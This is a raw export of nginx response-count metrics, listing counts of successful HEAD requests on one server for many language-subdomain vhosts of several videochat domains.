nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="da.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="de.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ee.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="el.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="en.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="en.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eo.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="es.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="et.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="eu.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fa.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fi.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="fr.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ga.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.cafe"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gl.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="gu.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.cafe"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="he.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hi.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hr.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ht.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.date"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="hu.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="id.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="is.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="it.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.date"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jp.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="jv.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ka.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kk.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="km.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="kn.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ko.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ky.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lb.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lo.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lt.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.date"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="lv.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mg.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.mx"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ml.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mn.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mr.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mrj.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ms.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="mt.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="my.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ne.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="nl.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.cafe"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="no.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pa.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pap.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pl.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.cafe"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="pt.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ro.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sco.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="si.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="sk.videochat.world"} 6 